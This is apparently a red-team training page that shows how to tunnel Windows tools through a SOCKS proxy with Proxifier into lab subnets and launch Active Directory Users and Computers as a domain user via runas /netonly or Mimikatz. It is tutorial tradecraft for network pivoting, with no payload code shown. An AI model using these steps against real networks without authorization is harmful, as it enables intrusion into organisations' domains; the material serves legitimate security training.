Windows Tools
We can also tunnel traffic from our Windows machine using a software utility called Proxifier. To create a new proxy entry, go to Profile > Proxy Servers. Click Add and enter the relevant details.
\
\
When asked if you want to use this proxy by default, select No. But select Yes when prompted to go to the Proxification Rules. Here, we tell Proxifier which applications to proxy and under what conditions.
Click Add to create a new rule and use the following:
Name: Tools
Applications: Any
Target hosts: 10.10.120.0/24;10.10.122.0/24
Target ports: Any
Action: Proxy SOCKS5 10.10.5.50
\
\
To enable authentication to occur over the proxy, an application needs to be launched as a user from the target domain. This can be achieved using runas /netonly or Mimikatz.
Let's use Active Directory Users and Computers (ADUC) as an example. The file responsible for launching ADUC is dsa.msc, which is actually just a snap-in for mmc.exe. Launch mmc.exe via runas, then go to File > Add/Remove Snap-in (or Ctrl + M for short), add the ADUC snap-in, and click OK.
\
Right-click on the snap-in, select Change Domain, enter dev.cyberbotic.io and click OK. You will see Proxifier begin to capture and relay traffic and ADUC loads the content. You may continue to drill down into the users and computers etc.
\
\
To achieve the same with Mimikatz:
\
PowerShell cmdlets that support credential objects can also be used.
Last updated
